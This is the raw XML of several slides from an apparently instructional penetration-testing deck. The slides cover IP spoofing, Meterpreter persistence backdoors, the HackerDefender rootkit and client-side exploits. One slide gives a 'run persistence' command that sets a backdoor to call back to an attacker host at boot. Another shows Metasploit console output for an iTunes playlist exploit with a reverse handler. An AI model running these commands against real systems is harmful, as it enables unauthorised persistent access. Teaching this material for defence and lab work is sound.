            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s8264" name="Clip" r:id="rId5" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId5" imgW="1307079" imgH="1083682"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0400" y="3070225"/>
                        <a:ext cx="868363" cy="739775"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="8199" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9118600" y="2571750"/>
            <a:ext cx="1760538" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>212.68.212.7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8200" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1536700" y="2614613"/>
            <a:ext cx="1901825" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>145.13.145.67</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8201" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3151188" y="3444875"/>
            <a:ext cx="6118225" cy="0"/>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8202" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4791075" y="2514600"/>
            <a:ext cx="2259013" cy="746125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SA: 36.220.9.59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DA: 212.68.212.7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8203" name="Object 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4948238" y="4514850"/>
          <a:ext cx="869950" cy="741363"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s8265" name="Clip" r:id="rId6" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="1307079" imgH="1083682" progId="">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8238" y="4514850"/>
                        <a:ext cx="869950" cy="741363"/>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alpha val="74997"/>
                                </a:srgbClr>
                              </a:outerShdw>
                            </a:effectLst>
                          </a14:hiddenEffects>
                        </a:ext>
                      </a:extLst>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8204" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4738688" y="3968750"/>
            <a:ext cx="1617662" cy="439738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>36.220.9.59</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8205" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5989638" y="3759200"/>
            <a:ext cx="3424237" cy="1060450"/>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8206" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7834313" y="4435475"/>
            <a:ext cx="2244725" cy="747713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SA: 212.68.212.7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DA: 36.220.9.59</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8207" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1609725" y="3810000"/>
            <a:ext cx="1539875" cy="563563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8208" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10541000" y="2971800"/>
            <a:ext cx="1192213" cy="561975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>victim</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bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="1066800"/>
            <a:ext cx="12204700" cy="779463"/>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Persistence Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94211" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="1905000"/>
            <a:ext cx="11703050" cy="6435725"/>
          </a:xfrm>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Creates persistent backdoor which can be configured to connect back to attacker on system boot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Creates a vbs file and registry key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Can be uninstalled remotely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“run persistence –A –L c:\\windows\system32 –X –i 10 –p 443 –r 192.168.1.10”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="94212" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1092200" y="5410200"/>
            <a:ext cx="10552113" cy="4210050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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bwMode="auto">
          <a:xfrm>
            <a:off x="254000" y="838200"/>
            <a:ext cx="12203113" cy="1192213"/>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Persistence Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95235" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="1981200"/>
            <a:ext cx="11703050" cy="643572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a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Backdoor runs as a service on the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker can connect to it remotely </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Less noisy compared to persistence script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="95236" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1058863" y="4224338"/>
            <a:ext cx="10731500" cy="5130800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="990600"/>
            <a:ext cx="12204700" cy="7905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“3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0" baseline="30000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Party” Rootkits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96259"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Used for more advanced post exploitation.  Hiding process, files, data exfil.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HackerDefender – written by HolyFather</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500" algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Kernel mode rootkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500" algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Holy Father offered custom builds of HD to bypass AV/IDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500" algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Well understood – so we will use this in Lab 4</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bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="1066800"/>
            <a:ext cx="12204700" cy="7905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Client Side Exploits	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97283"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Network side exploits are becoming more and more rare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attackers have moved to “client side” exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client-side exploits leverage software/applications running on the target system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Browser based attacks are common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Java also significant attack vector	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500" algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRP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bwMode="auto">
          <a:xfrm>
            <a:off x="406400" y="1066800"/>
            <a:ext cx="11703050" cy="828675"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91435" tIns="45718" rIns="91435" bIns="45718" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example Client Side Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98307" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91435" tIns="45718" rIns="91435" bIns="45718"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5BFDBAF7-8DF6-43BD-8547-47062DC82226}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1100" smtClean="0"/>
              <a:pPr/>
              <a:t>94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98308" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1625600" y="2384425"/>
            <a:ext cx="9996488" cy="5943600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="914400"/>
            <a:ext cx="11703050" cy="828675"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91435" tIns="45718" rIns="91435" bIns="45718" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example Client Side Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99331" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91435" tIns="45718" rIns="91435" bIns="45718" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>msf&gt; exploit(apple_itunes_playlist) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>[*] Started reverse handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>[*] Using URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>http://10.10.11.10:8080/mycoolplaylist.pls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>[*] Server started.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>[*] Exploit running as background job.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
